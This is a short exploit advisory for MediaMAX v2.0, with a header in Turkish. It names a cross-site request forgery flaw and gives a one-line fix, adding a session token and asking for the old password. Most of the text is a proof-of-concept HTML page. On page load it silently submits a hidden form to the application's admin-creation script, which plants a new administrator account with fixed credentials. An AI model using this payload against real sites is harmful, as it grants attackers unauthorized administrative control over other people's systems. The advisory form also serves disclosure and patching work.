< ------------------- header data start ------------------- >

#############################################################

# Application Name : MediaMAX v2.0

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >


<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form action=http://www.site.com/administrator/admins_create.php method=post name=BizaRRo>
<input type=hidden id=submitform name=submitform value=1 >

<input id=username name=username value=bizo type=hidden/>
<input id=password name=password value=bizo type=hidden/>
<input id=email name=email value=[email protected] type=hidden/>

<input type=submit value=create name=B1>


< -- bug code end of -- >